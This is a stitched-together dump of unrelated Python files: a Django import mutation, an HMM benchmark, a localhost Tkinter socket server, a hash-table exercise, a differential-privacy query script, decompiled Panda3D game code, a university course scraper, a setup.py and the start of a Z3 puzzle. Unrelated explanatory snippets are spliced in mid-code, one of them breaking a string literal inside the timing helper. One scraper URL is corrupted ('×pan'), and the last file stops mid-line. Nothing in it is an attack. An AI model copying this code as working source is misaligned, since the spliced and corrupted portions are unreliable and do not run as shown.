"Import product variants from file" ) permissions = (ProductPermissions.MANAGE_PRODUCTS,) error_type_class = ProductError error_type_field = "product_errors" @classmethod def perform_mutation(cls, root, info, **data): file_format = FILE_FORMAT.get('xlsx', FILE_FORMAT['xlsx']) file_index = data.get('file') file: InMemoryUploadedFile = info.context.FILES.get(file_index) if file: import_mixin = ImportMixin() import_formats = import_mixin.get_import_formats() input_format = import_formats[file_format]() tmp_storage = import_mixin.write_to_tmp_storage(file, input_format) product_variant_import.delay(tmp_storage.name, file_format) return cls() 0 from __future__ import print_function import time from contextlib import contextmanager from hmmlearn.hmm import GaussianHMM @contextmanager def timed_step(title): print(title, end="... 
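# The timed_step() helper beginning here uses time.clock() (in the lines that
# follow), which was deprecated in Python 3.3 and removed in Python 3.8. A
# sketch of the same context manager using time.perf_counter() instead:
import time
from contextlib import contextmanager

@contextmanager
def timed_step_pc(title):
    print(title, end="... ", flush=True)
    start = time.perf_counter()
    try:
        yield
    finally:
        print("done in {0:.2f}s".format(time.perf_counter() - start))

# Example:
with timed_step_pc("sleeping"):
    time.sleep(0.1)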
", flush=True) start_time = time.clock() yield end_time = time.clock() print("done in {0:.2f}s".format(end_time - start_time)) def bench_gaussian_hmm(size): title = "benchmarking Gaussian HMM on a sample of size {0}".format(size) print(title.center(36, " ")) ghmm = GaussianHMM() ghmm.means_ = [[42], [24]] ghmm.covars_ = [[1], [1]] with timed_step("generating sample"): sample, _states = ghmm.sample(size) with timed_step("fitting"): fit = GaussianHMM(n_components=2).fit([sample]) with timed_step("estimating states"): fit.predict(sample) if __name__ == "__main__": bench_gaussian_hmm(2**16) # -*- coding: UTF-8 -*- import socket import threading import tkinter as tk import time import queue from PIL import Image, ImageTk from playsound import playsound window = tk.Tk() message_queue = queue.Queue(maxsize=10) def notify_sound(): playsound('tools/notify.mp3') def show_message(message): global message_queue temp_queue = queue.Queue(maxsize=10) localtime = time.localtime() result = time.strftime("%Y-%m-%d %I:%M:%S %p", localtime) if message_queue.full(): message_queue.get() message_queue.put([result, message]) else: message_queue.put([result, message]) index = message_queue.qsize() + 1 while not message_queue.empty(): message_list = message_queue.get() temp_queue.put(message_list) label_time = tk.Label(window, text=message_list[0], fg='#263238', font=('Arial', 12), width=30, height=2) label_time.grid(column=0, row=index) label_message = tk.Label(window, text=message_list[1], fg='#263238', font=('Arial', 12), width=45, height=2) label_message.grid(column=1, row=index) index -= 1 message_queue, temp_queue = temp_queue, message_queue t_notify = threading.Thread(target = notify_sound) t_notify.start() def server(): # HOST = '192.168.127.12' #實驗室電腦 # PORT = 8887 #在自己電腦測試的話 HOST = '127.0.0.1' PORT = 8888 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((HOST, PORT)) s.listen(5) print('server start at: %s:%s' % (HOST, PORT)) print('wait for connection...') while True: conn, addr = s.accept() print('connected by ' + str(addr)) while True: indata = conn.recv(1024) if len(indata) == 0: # connection closed conn.close() print('client closed connection.') break message = indata.decode() print('recv: ' + message) # 將傳來的訊息顯示在GUI視窗上 show_message(message=message) outdata = 'echo ' + indata.decode() conn.send(outdata.encode()) def creat_label(): label1 = tk.Label(window, text='日期與時間', bg='yellow', fg='#263238', font=('Arial', 12), width=30, height=2) label1.grid(column=0, row=0) label2 = tk.Label(window, text='地址', bg='orange', fg='#263238', font=('Arial', 12), width=45, height=2) label2.grid(column=1, row=0) if __name__=='__main__': window.title('Server') window.geometry('1130x710') creat_label() t_server = threading.Thread(target = server) t_server.daemon = True t_server.start() window.mainloop()1-10 # python3 def hash(S, m): res = 0 p = 1000000007 x = 263 for i in range(len(S)): res += ((ord(S[i]))*(x**i))%p return (res%p)%m def solve(m, N): d = {} for N0 in range(N): l = input().split() if l[0] == 'add': s = l[1] h = hash(s, m) if h not in d: d[h] = [] d[h].append(s) else: if s not in d[h]: d[h].append(s) elif l[0] == 'del': s = l[1] h = hash(s, m) if h in d: if s in d[h]: d[h].remove(s) elif l[0] == 'find': s = l[1] h = hash(s, m) if h in d: if s in d[h]: print("yes") else: print("no") else: print("no") elif l[0] == 'check': i = int(l[1]) if i in d: for e in d[i][::-1]: print(e, end=" ") print() else: print() #print(d) if __name__ == 
'__main__': m = int(input()) N = int(input()) solve(m, N) # Copyright 2018 Whitestack, LLC # ************************************************************* # This file is part of OSM Monitoring module # All Rights Reserved to Whitestack, LLC # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # For those usages not covered by the Apache License, Version 2.0 please # contact: or ## import logging from typing import List import requests from requests.auth import HTTPBasicAuth from osm_mon.collector.infra_collectors.base_sdnc import BaseSdncInfraCollector from osm_mon.collector.metric import Metric from osm_mon.core.common_db import CommonDbClient from osm_mon.core.config import Config log = logging.getLogger(__name__) class OnosInfraCollector(BaseSdncInfraCollector): def __init__(self, config: Config, sdnc_id: str): super().__init__(config, sdnc_id) self.common_db = CommonDbClient(config) self.sdnc = self.common_db.get_sdnc(sdnc_id) def collect(self) -> List[Metric]: metrics = [] sdnc_status = self.is_sdnc_ok() if self.sdnc['_admin']['projects_read']: sdnc_project_id = self.sdnc['_admin']['projects_read'][0] else: sdnc_project_id = '' sdnc_tags = { 'sdnc_id': self.sdnc['_id'], 'project_id': sdnc_project_id } sdnc_status_metric = Metric(sdnc_tags, 'sdnc_status', sdnc_status) metrics.append(sdnc_status_metric) return metrics def is_sdnc_ok(self) -> bool: try: ip = self.sdnc['ip'] port = self.sdnc['port'] user = self.sdnc['user'] password = self.common_db.decrypt_sdnc_password(self.sdnc['password'], self.sdnc['schema_version'], self.sdnc['_id']) # TODO: Add support for https url = 'http://{}:{}/onos/v1/devices'.format(ip, port) requests.get(url, auth=HTTPBasicAuth(user, password)) return True except Exception: log.exception("SDNC status is not OK!") return False from mbi import LocalInference import numpy as np import argparse from hdmm import workload, templates, error from mbi import Dataset import itertools from autodp import privacy_calibrator import os import pandas as pd import pickle """ This is an implementation of HDMM+APPGM as described in the paper "Relaxed Marginal Consistency for Differentially Private Query Answering" This is a mechanism for answering a workload of marginal queries under epsilon or (epsilon, delta)-DP. This file depends on the autodp library and the hdmm library. The former can be installed with $ pip install autodp The latter can be installed by following the instructions on the official HDMM repository https://github.com/dpcomp-org/hdmm Note that HDMM optimizes for a measure of overall error. It achieves this by adding adding correlated non-uniform noise to different queries. If you are interested in evaluating max error, HDMM will be outperformed by a simpler mechanism that just answers every query with the same amount of noise, at least for the special case of marginal query workloads. Note that this file can take some time to run. The strategy selection step takes a good amount of time, but is saved so subsequent calls will take less time than the first call. 
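# The chained hash table above computes hash(S, m) as the sum of
# ord(S[i]) * x**i modulo p, reduced modulo m. The same value can be computed
# without large powers using Horner's rule (processing the string right to
# left); a quick self-check against the direct formula on sample words:
def poly_hash(s, m, p=1000000007, x=263):
    h = 0
    for ch in reversed(s):
        h = (h * x + ord(ch)) % p
    return h % m

def naive_hash(s, m, p=1000000007, x=263):
    return sum(ord(s[i]) * x**i for i in range(len(s))) % p % m

for word in ("world", "HellO", "add"):
    assert poly_hash(word, 5) == naive_hash(word, 5)
print("hashes match")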
""" def convert_matrix(domain, cliques): weights = {} for proj in cliques: tpl = tuple([domain.attrs.index(i) for i in proj]) weights[tpl] = 1.0 return workload.Marginals.fromtuples(domain.shape, weights) def convert_back(domain, Q): cliques = [] weights = [] for Qi in Q.matrices: wgt = Qi.weight key = tuple([domain.attrs[i] for i in Qi.base.tuple()]) cliques.append(key) weights.append(wgt) return cliques, weights def default_params(): """ Return default parameters to run this program :returns: a dictionary of default parameter settings for each command line argument """ params = {} params['dataset'] = '../data/adult.csv' params['domain'] = '../data/adult-domain.json' params['epsilon'] = 1.0 params['delta'] = 1e-9 params['degree'] = 2 params['num_marginals'] = None params['max_cells'] = 10000 params['noise'] = 'gaussian' params['parameterization'] = 'OPT+' params['pgm_iters'] = 2500 params['restarts'] = 1 params['seed'] = 0 params['save'] = None return params def optm(queries, approx=False): W = convert_matrix(data.domain, queries) if os.path.exists(strategy_path): print('loading strategy from file') A = pickle.load(open(strategy_path, 'rb')) else: print('optimizing strategy, could take a while') best_obj = np.inf for _ in range(args.restarts): if args.parameterization == 'OPTM': temp = templates.Marginals(data.domain.shape, approx=args.noise == 'gaussian', seed=args.seed) else: temp = templates.MarginalUnionKron(data.domain.shape, len(queries), approx=args.noise=='gaussian') obj = temp.optimize(W) if obj < best_obj: best_obj = obj A = temp.strategy() return convert_back(data.domain, A) def opt_plus(queries, approx=False): # Just return the workload itself, appropriately weighted weights = np.ones(len(queries)) return queries, weights if __name__ == '__main__': description = '' formatter = argparse.ArgumentDefaultsHelpFormatter parser = argparse.ArgumentParser(description=description, formatter_class=formatter) parser.add_argument('--dataset', type=str, help='path to dataset file') parser.add_argument('--domain', type=str, help='path to domain file') parser.add_argument('--epsilon', type=float, help='privacy parameter') parser.add_argument('--delta', type=float, help='privacy parameter') parser.add_argument('--degree', type=int, help='degree of marginals in workload') parser.add_argument('--num_marginals', type=int, help='number of marginals in workload') parser.add_argument('--max_cells', type=int, help='maximum number of cells for marginals in workload') parser.add_argument('--parameterization', choices=['OPTM', 'OPT+'], help='Strategy parameterization to optimize over') parser.add_argument('--noise', choices=['laplace', 'gaussian'], help='noise distribution to use') parser.add_argument('--workload', type=int, help='number of marginals in workload') parser.add_argument('--pgm_iters', type=int, help='number of optimization iterations') parser.add_argument('--restarts', type=int, help='number of HDMM restarts') parser.add_argument('--seed', type=int, help='random seed') parser.add_argument('--save', type=str, help='path to save results') parser.set_defaults(**default_params()) args = parser.parse_args() prng = np.random.RandomState(args.seed) data = Dataset.load(args.dataset, args.domain) print('%d Dimensional Domain' % len(data.domain)) if len(data.domain) >= 13 and args.parameterization == 'OPTM': print('Time complexity of strategy optimization using OPT_M is O(4^d), could be slow for this domain') queries = list(itertools.combinations(data.domain, args.degree)) queries = [cl for cl in 
queries if data.domain.size(cl) <= args.max_cells] if args.num_marginals is not None: queries = [queries[i] for i in prng.choice(len(queries), args.num_marginals, replace=False)] key = (args.degree, args.seed, data.domain.shape, args.noise == 'gaussian', args.max_cells, args.parameterization == 'OPTM') print(hash(key)) strategy_path = 'hdmm-%d.pkl' % hash(key) W = convert_matrix(data.domain, queries) if os.path.exists(strategy_path): print('loading strategy from file') strategy = pickle.load(open(strategy_path, 'rb')) else: if args.parameterization == 'OPTM': strategy = optm(queries, approx=args.noise == 'gaussian') else: strategy = opt_plus(queries, approx=args.noise == 'gaussian') pickle.dump(strategy, open(strategy_path, 'wb')) cliques, weights = strategy prng = np.random if args.noise == 'laplace': var = 2.0 / args.epsilon**2 sensitivity = np.linalg.norm(weights, 1) add_noise = lambda x: x+sensitivity*prng.laplace(loc=0, scale=1.0/args.epsilon, size=x.size) else: sigma = privacy_calibrator.gaussian_mech(args.epsilon, args.delta)['sigma'] var = sigma**2 sensitivity = np.linalg.norm(weights, 2) add_noise = lambda x: x + sensitivity*prng.normal(loc=0, scale=sigma, size=x.size) measurements = [] for proj, wgt in zip(cliques, weights): Q = wgt*workload.Identity(data.domain.size(proj)) x = data.project(proj).datavector() y = add_noise(Q @ x) measurements.append((Q,y,1.0,proj)) engine = LocalInference(data.domain,iters=args.pgm_iters, log=True) model = engine.estimate(measurements) errors = [] for proj in queries: X = data.project(proj).datavector() Y = model.project(proj).datavector() e = 0.5*np.linalg.norm(X/X.sum() - Y/Y.sum(), 1) errors.append(e) print('Average Error: ', np.mean(errors)) wapj/pyconkr2019 import asyncio import os import slack client = slack.WebClient(token=os.environ["BOT_ACCESS_TOKEN"], run_async=True) async def send_async_message(channel="#random", text="Hello"): response = await client.chat_postMessage(channel=channel, text=text) assert response["ok"] async def main(): await send_async_message() asyncio.run(main()) from django.urls import path from .views import ListPokemon, GetPokemon urlpatterns = [ path('', ListPokemon.as_view()), path('/', GetPokemon.as_view()) ]10-100 from .paddle import PaddleClient, PaddleException # NOQA: F401 # uncompyle6 version 3.2.4 # Python bytecode 2.7 (62211) # Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)] # Embedded file name: lib.coginvasion.minigame.DistributedMinigame from panda3d.core import VBase4 from direct.distributed import DistributedObject from direct.gui.DirectGui import DirectLabel, OnscreenText from direct.interval.IntervalGlobal import Sequence, LerpFunc, Wait, Func from direct.showbase.Transitions import Transitions from direct.fsm.State import State from direct.fsm.ClassicFSM import ClassicFSM import Timer from lib.coginvasion.hood import ZoneUtil from lib.coginvasion.globals import CIGlobals from lib.coginvasion.gui.Dialog import GlobalDialog from HeadPanels import HeadPanels from FinalScoreGUI import FinalScoreGUI from lib.coginvasion.nametag import NametagGlobals import random transitions = Transitions(loader) def getAlertText(fg=(1, 0.9, 0.3, 1), scale=0.08): return OnscreenText(text='', font=CIGlobals.getMickeyFont(), fg=fg, pos=(0, 0.8, 0), scale=scale) def getAlertPulse(text, toScale1=0.12, toScale2=0.1): def change_text_scale(num): text.setScale(num) seq = Sequence(LerpFunc(change_text_scale, duration=0.3, toData=toScale1, fromData=0.01, 
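# Two standalone sketches of steps used just above in the HDMM+APPGM script:
# (1) the Laplace branch adds noise scaled by the workload's L1 sensitivity
# divided by epsilon (the Gaussian branch instead takes sigma from autodp's
# privacy_calibrator, not re-derived here), and (2) each marginal is scored by
# half the L1 distance between the normalized true and estimated count
# vectors, i.e. the total variation distance, which lies in [0, 1]. The counts
# below are illustrative.
import numpy as np

epsilon = 1.0
weights = np.ones(3)                        # one weight per measured marginal
sensitivity = np.linalg.norm(weights, 1)    # L1 sensitivity across the workload

rng = np.random.RandomState(0)
true_counts = np.array([120.0, 45.0, 300.0])
noisy = true_counts + sensitivity * rng.laplace(loc=0, scale=1.0 / epsilon,
                                                size=true_counts.size)

def tv_error(x, y):
    return 0.5 * np.linalg.norm(x / x.sum() - y / y.sum(), 1)

print(noisy)
print(tv_error(true_counts, np.abs(noisy)))                   # error of the noisy answer
print(tv_error(np.array([1.0, 0.0]), np.array([0.0, 1.0])))   # maximal error: 1.0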
blendType='easeOut'), LerpFunc(change_text_scale, duration=0.2, toData=toScale2, fromData=toScale1, blendType='easeInOut'), Wait(3.0), Func(text.setText, '')) return seq class DistributedMinigame(DistributedObject.DistributedObject, Timer.Timer): def __init__(self, cr): try: self.DistributedMinigame_initialized return except: self.DistributedMinigame_initialized = 1 DistributedObject.DistributedObject.__init__(self, cr) Timer.Timer.__init__(self) self.headPanels = HeadPanels() self.finalScoreUI = FinalScoreGUI() self.fsm = ClassicFSM('DistributedMinigame', [State('start', self.enterStart, self.exitStart, ['waitForOthers']), State('waitForOthers', self.enterWaitForOthers, self.exitWaitForOthers, ['play']), State('play', self.enterPlay, self.exitPlay, ['gameOver']), State('gameOver', self.enterGameOver, self.exitGameOver, ['off']), State('off', self.enterOff, self.exitOff)], 'off', 'off') self.fsm.enterInitialState() self.cr = cr self.localAv = base.localAvatar self.localAvId = self.localAv.doId self.musicPath = 'phase_4/audio/bgm/trolley_song.mid' self.winSfx = base.loadSfx('phase_4/audio/sfx/MG_win.ogg') self.loseSfx = base.loadSfx('phase_4/audio/sfx/MG_lose.ogg') self.prizeHigh = base.loadSfx('phase_6/audio/sfx/KART_Applause_1.ogg') self.prizeLow = base.loadSfx('phase_6/audio/sfx/KART_Applause_4.ogg') self.music = None self.description = '' self.descDialog = None self.winnerPrize = 0 self.loserPrize = 0 self.winnerMsg = 'Winner!\nYou have earned: %s Jellybeans' self.loserMsg = 'Loser!\nYou have earned: %s Jellybeans' self.allWinnerMsgs = ['Nice try!\nYou have earned: %s', 'Good job!\nYou have earned: %s', 'Way to go!\nYou have earned: %s', 'Awesome!\nYou have earned: %s'] self.timer = None self.timeLbl = None self.alertText = None self.alertPulse = None self.popupSound = None self.gameOverLbl = OnscreenText(text="TIME'S\nUP!", scale=0.25, font=CIGlobals.getMickeyFont(), fg=(1, 0, 0, 1)) self.gameOverLbl.setBin('gui-popup', 60) self.gameOverLbl.hide() return def getTeamDNAColor(self, team): pass def showAlert(self, text): self.stopPulse() base.playSfx(self.popupSound) self.alertText.setText(text) self.alertPulse = getAlertPulse(self.alertText) self.alertPulse.start() def stopPulse(self): if self.alertPulse: self.alertPulse.finish() self.alertPulse = None return def enterFinalScores(self): self.finalScoreUI.load() self.finalScoreUI.showFinalScores() def exitFinalScores(self): self.finalScoreUI.hideFinalScores() self.finalScoreUI.unload() def finalScores(self, avIdList, scoreList): self.finalScoreUI.handleFinalScores(avIdList, scoreList) def generateHeadPanel(self, gender, head, headtype, color, doId, name): self.headPanels.generate(gender, head, headtype, color, doId, name) def updateHeadPanelValue(self, doId, direction): self.headPanels.updateValue(doId, direction) def setTimerTime(self, time): self.setTime(time) def createTimer(self): Timer.Timer.load(self) def deleteTimer(self): Timer.Timer.unload(self) def setDescription(self, desc): self.description = desc def getDescription(self): return self.description def enterStart(self): self.descDialog = GlobalDialog(style=3, message=self.getDescription(), doneEvent='gameDescAck') self.acceptOnce('gameDescAck', self.handleDescAck) def handleDescAck(self): self.d_ready() self.fsm.request('waitForOthers') def exitStart(self): self.ignore('gameDescAck') self.descDialog.cleanup() del self.descDialog def enterWaitForOthers(self): self.waitLbl = DirectLabel(text='Waiting for other players...', relief=None, text_fg=(1, 1, 1, 1), text_scale=0.08, 
text_shadow=(0, 0, 0, 1)) return def exitWaitForOthers(self): self.waitLbl.destroy() del self.waitLbl def setLoserPrize(self, prize): self.loserPrize = prize def setWinnerPrize(self, prize): self.winnerPrize = prize def getLoserPrize(self): return self.loserPrize def getWinnerPrize(self): return self.winnerPrize def winner(self): self.winSfx.play() self.localAv.b_setAnimState('happy') Sequence(Wait(3.5), Func(self.displayGameOver, 'winner')).start() def showPrize(self, amt): self.winSfx.play() self.localAv.b_setAnimState('happy') Sequence(Wait(3.5), Func(self.displayGameOver, 'showPrize', amt)).start() def loser(self): self.loseSfx.play() self.localAv.b_setAnimState('neutral') Sequence(Wait(3.5), Func(self.displayGameOver, 'loser')).start() def displayGameOver(self, scenario, amt=None): if scenario == 'winner': msg = self.winnerMsg % self.winnerPrize self.prizeHigh.play() else: if scenario == 'loser': msg = self.loserMsg % self.loserPrize self.prizeLow.play() else: if scenario == 'showPrize': msg = random.choice(self.allWinnerMsgs) % amt self.prizeHigh.play() self.gameOverDialog = GlobalDialog(message=msg, style=3, doneEvent='gameOverAck') self.acceptOnce('gameOverAck', self.__handleGameOverAck) self.gameOverDialog.show() def deleteGameOverDialog(self): self.ignore('gameOverAck') if hasattr(self, 'gameOverDialog'): self.gameOverDialog.cleanup() del self.gameOverDialog def __handleGameOverAck(self): self.fsm.requestFinalState() Sequence(Func(base.transitions.irisOut, 1.0), Wait(1.2), Func(self.d_leaving), Func(self.headBackToMinigameArea)).start() def headBackToMinigameArea(self): whereName = ZoneUtil.getWhereName(CIGlobals.MinigameAreaId) loaderName = ZoneUtil.getLoaderName(CIGlobals.MinigameAreaId) requestStatus = {'zoneId': CIGlobals.MinigameAreaId, 'hoodId': CIGlobals.MinigameArea, 'where': whereName, 'how': 'teleportIn', 'avId': base.localAvatar.doId, 'shardId': None, 'loader': loaderName} self.cr.playGame.hood.fsm.request('quietZone', [requestStatus]) return def abort(self): self.headBackToMinigameArea() def load(self, showDesc=True): if showDesc: self.fsm.request('start') base.transitions.irisIn() def d_leaving(self): self.sendUpdate('leaving', []) def allPlayersReady(self): self.fsm.request('play') def enterPlay(self): self.playMinigameMusic() def exitPlay(self): self.stopMinigameMusic() def enterOff(self): pass def exitOff(self): pass def enterGameOver(self, winner, winnerDoId, allPrize): if winner: if self.localAvId in winnerDoId: self.winner() else: self.loser() else: self.showPrize(allPrize) def exitGameOver(self): self.deleteGameOverDialog() def gameOver(self, winner=0, winnerDoId=[], allPrize=0): self.fsm.request('gameOver', [winner, winnerDoId, allPrize]) def setMinigameMusic(self, path): self.musicPath = path def getMinigameMusic(self): return self.musicPath def playMinigameMusic(self): self.stopMinigameMusic() self.music = base.loadMusic(self.musicPath) self.music.setLoop(True) self.music.setVolume(0.8) self.music.play() def stopMinigameMusic(self): if self.music: self.music.stop() self.music = None return def d_ready(self): self.sendUpdate('ready', []) def announceGenerate(self): DistributedObject.DistributedObject.announceGenerate(self) base.minigame = self self.alertText = getAlertText() self.popupSound = base.loadSfx('phase_3/audio/sfx/GUI_balloon_popup.ogg') NametagGlobals.setWant2dNametags(False) def disable(self): base.localAvatar.getGeomNode().setColorScale(VBase4(1, 1, 1, 1)) if hasattr(self, 'gameOverLbl') and self.gameOverLbl: self.gameOverLbl.destroy() 
self.gameOverLbl = None NametagGlobals.setWant2dNametags(True) base.localAvatar.setPosHpr(0, 0, 0, 0, 0, 0) self.fsm.requestFinalState() del self.fsm self.winSfx = None self.loseSfx = None self.prizeHigh = None self.prizeLow = None self.headPanels.delete() self.headPanels = None self.finalScoreUI.unload() self.finalScoreUI = None base.minigame = None DistributedObject.DistributedObject.disable(self) returnfhir_kindling/serde/__init__.py from .flatten import flatten_resource, flatten_resources #!/usr/bin/env python2 """Common utility functions.""" DEFAULT_OBJECT_NUMBER = 1238 DEFAULT_BAD_OBJECT_NUMBER = 23 OBJECTS_FILE = 'objects.txt' WORKING_SET_FILE = 'working_set.txt' def ReadWorkingSet(): working_set = [] f = open(WORKING_SET_FILE, 'r') for l in f: working_set.append(int(l)) f.close() return working_set def WriteWorkingSet(working_set): f = open(WORKING_SET_FILE, 'w') for o in working_set: f.write('{0}\n'.format(o)) f.close() def ReadObjectsFile(): objects_file = [] f = open(OBJECTS_FILE, 'r') for l in f: objects_file.append(int(l)) f.close() return objects_file def ReadObjectIndex(filename): object_index = [] f = open(filename, 'r') for o in f: object_index.append(int(o)) f.close() return object_index old/Crawl.py from bs4 import BeautifulSoup import requests import json from cleanSubTime import cleanScheduleTime def Get_Url(discipline: str, keyword1: str) -> str: ''' Trả về đường link source của môn học >>> Get_Url("ENG", "116") ''' parameters = { 'discipline': discipline, # F = 1 (ENG 116), F = 2 (CS 303) 'keyword1': keyword1, 'hocky': '70', } r = requests.get('http://courses.duytan.edu.vn/Modules/academicprogram/CourseResultSearch.aspx', parameters) soup = BeautifulSoup(r.text, 'html.parser') def XuLyUrlSub(url_sub: str) -> str: print('url',url_sub) url = "http://courses.duytan.edu.vn/Modules/academicprogram/CourseClassResult.aspx?courseid=55&semesterid=70×pan=70" courseid = url_sub[73:url_sub.find("×pan")] return url.replace(url[85:87], courseid) try: url_sub = soup.find_all(class_='hit')[2]['href'] # link sau khi press Search return XuLyUrlSub(url_sub) except: return None def Get_Soup(url_sub: str): req = requests.get(url_sub) soup = BeautifulSoup(req.text, 'html.parser') return soup def CheckExistLab(soup): ''' Hàm này để kiểm tra môn học có lớp Thực hành không Nếu có sẽ trả về True, không có trả về False ''' templst = [] tr_tags = soup.find_all("tr", class_ = "lop") for tr_tag in tr_tags: templst.append(str(tr_tag('td')[2].string).strip()) if len(set(templst)) == 2: return True else: return False def GetListExistId(soup, lst_input: list): result = [] key = [] list_sub_id = [] tr_tags = soup.find_all("tr", class_ = "lop") for tr_tag in tr_tags: list_sub_id.append(str(tr_tag('td')[1].a.string).strip()) if CheckExistLab(soup): for i in range(len(list_sub_id)): if i % 2 == 0: list_sub_id[i] = list_sub_id[i+1] for i in range(len(list_sub_id)): if list_sub_id[i] != "": key.append(i) for i in range(len(lst_input)): if i in key: result.append(lst_input[i]) return result def GetName(soup): out = [] tr_tags = soup.find_all('tr', class_="lop") for tr_tag in tr_tags: out.append(str(tr_tag.td.a.string).strip()) return GetListExistId(soup, out) def GetID(soup): list_sub_id = [] tr_tags = soup.find_all("tr", class_ = "lop") for tr_tag in tr_tags: list_sub_id.append(str(tr_tag('td')[1].a.string).strip()) if CheckExistLab(soup): for i in range(len(list_sub_id)): if i % 2 == 0: list_sub_id[i] = list_sub_id[i+1] while ("" in list_sub_id): list_sub_id.remove("") return list_sub_id def 
GetSeat(soup): list_sub_seat = [] templst = [] result = [] td_list = soup.find_all("td", align = "center") for td_tag in td_list: templst.append((str(td_tag.text).strip())) for temp in templst: if (len(temp) <= 2) or temp == "Hết chỗ": list_sub_seat.append(temp) for mem in list_sub_seat: if mem == "Hết chỗ": result.append(int(0)) else: result.append(int(mem)) return GetListExistId(soup, result) def GetCredit(soup): ''' Phương thức này trả về 1 int, không phải list vì Credit của các lớp bằng nhau ''' templst = soup.find(style = "width: 130px;") for mem in templst: tr_tag = mem.parent tr_tag_next = tr_tag.findNext("tr") tinchi = str(tr_tag_next.text).strip() key = tinchi.find("(") tinchi = int(tinchi[key+1]) return tinchi def GetSchedule(soup): lst = [] tr_list = soup.find_all("tr", class_='lop') for tr_tag in tr_list: lst.append(json.dumps(cleanScheduleTime(str(tr_tag('td')[6])))) return GetListExistId(soup, lst) def GetWeekRange(soup): list_week = [] td_list = soup.find_all("td", style = "text-align: center;") for td_tag in td_list: list_week.append(str(td_tag.text).strip()) return GetListExistId(soup, list_week) def GetStatus(soup): lst = [] result = [] tr_list = soup.find_all("tr", class_='lop') for tr_tag in tr_list: lst.append(str(tr_tag('td')[10].font.string)) for mem in lst: if mem == "Còn Hạn Đăng Ký": result.append(int(1)) else: result.append(int(0)) return GetListExistId(soup, result) def GetSubName(soup): div_tag = soup.find(class_ = "title-1") return div_tag.string[div_tag.string.find(":") + 1 : ].replace(" ", "").replace("\xa0\r\n", "") def GetPlace(soup): list_sub_place = [] result = [] templst = [] tr_list = soup.find_all("tr", class_='lop') for tr_tag in tr_list: list_sub_place.append(str(tr_tag('td')[8].text).split("\r\n")) for place in list_sub_place: for mem in place: temp = mem.strip() if temp != "": templst.append(temp) result.append(", ".join(templst)) templst = [] return GetListExistId(soup, result) def GetTeacher(soup): list_sub_teacher = [] templst = [] result = [] tr_list = soup.find_all("tr", class_='lop') for tr_tag in tr_list: list_sub_teacher.append(str(tr_tag('td')[9].text).strip()) for i in range(len(list_sub_teacher)): if list_sub_teacher[i] == "": list_sub_teacher[i] = "" for mem in list_sub_teacher: templst.append(mem.split()) for temp in templst: result.append(" ".join(temp)) return GetListExistId(soup, result) if __name__ == "__main__": print(Get_Url("PSU-FIN","301"))from flask import Blueprint hello = Blueprint('hello', __name__) from . import views import os l=os.listdir('data') for i in l: pre='data/{}'.format(i) post=i[:-4]+'o' os.system('ld -r -b binary {} -o bin/{}'.format(pre,post)) GeekLogan/dcimg import re from setuptools import setup def get_version(): VERSIONFILE = 'dcimg.py' initfile_lines = open(VERSIONFILE, 'rt').readlines() VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]" for line in initfile_lines: mo = re.search(VSRE, line, re.M) if mo: return mo.group(1) raise RuntimeError('Unable to find version string in %s.' % (VERSIONFILE,)) with open("README.md", "r", encoding="utf-8") as fh: long_description = fh.read() setup( name='dcimg', version=get_version(), description='Python module to read Hamamatsu DCIMG files', long_description=long_description, long_description_content_type="text/markdown", url='https://github.com/lens-biophotonics/dcimg', # Author details author='', author_email='', # Choose your license license='MIT', # See https://pypi.python.org/pypi?%3Aaction=list_classifiers classifiers=[ # How mature is this project? 
Common values are # 3 - Alpha # 4 - Beta # 5 - Production/Stable 'Development Status :: 3 - Alpha', # Indicate who your project is intended for 'Intended Audience :: Developers', 'Topic :: Scientific/Engineering', # Pick your license as you wish (should match "license" above) 'License :: OSI Approved :: MIT License', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', ], # What does your project relate to? keywords='dcimg image files hamamatsu', py_modules=['dcimg'], install_requires=['numpy'], # List additional groups of dependencies here (e.g. development # dependencies). You can install these using the following syntax, # for example: # $ pip install -e .[dev,test] extras_require={ 'dev': [ 'pip-tools', ], 'test': [ 'ddt', ], 'doc': [ 'numpydoc', 'sphinx', 'sphinx_rtd_theme', ] }, ) z3/tunapalooza.py #!/usr/bin/python -u # -*- coding: latin-1 -*- # # Tunalalooza puzzle (Dell Logic Puzzles) in Z3 # # http://brownbuffalo.sourceforge.net/TunapaloozaClues.html # """ # Title: Tunapalooza # Author: # Publication: Dell Logic Puzzles # Issue: April, 1998 # Page: 10 # Stars: 2 # # Tim and Keri have a full day ahead for themselves as they plan to see # and hear everything at Tunapalooza '98, the annual save-the-tuna benefit # concert in their hometown. To cover the most ground, they will have to # split up. They have arranged to meet during four rock band acts # (Ellyfish, Korrupt, Retread Ed and the Flat Tires, and Yellow Reef) at # planned rendezvous points (carnival games, information booth, mosh pit, # or T-shirt vendor). Can you help match each band name with the type of # music they play (country, grunge, reggae, or speed metal) and Tim and # Kerri's prearranged meeting spot while they play? # # 1. Korrupt isn't a country or grunge music band. # 2. Tim and Kerri won't meet at the carnival games during Ellyfish's # performance. # 3. The pair won't meet at the T-shirt vendor during the reggae band's show. # 4. Exactly two of the following three statements are true: # a) Ellyfish plays grunge music. # b) Tim and Kerri won't meet at the information booth during a # performance by Retread Ed and the Flat Tires. # c) The two friends won't meet at the T-shirt vendor while Yellow Reef is playing. # 5. The country and speed metal acts are, in some order, Retread Ed # and the Flat Tires and the act during which Tim and Kerri will # meet at the mosh pit. # 6. The reggae band is neither Korrupt nor the act during which Tim and # Kerri will meet at the information booth. # # Determine: Band name -- Music type -- Meeting place # """ # # This Z3 model was written by () # See also my Z3 page: http://hakank.org/z3/ # from z3_utils_hakank import * sol = Solver() # data n = 4 rockband = range(n) [Ellyfish, Korrupt, Retread_Ed_and_the_Flat_Tires, Yellow_Reef] = rockband # variables genre = makeIntArrayVector(sol,"genre",n, 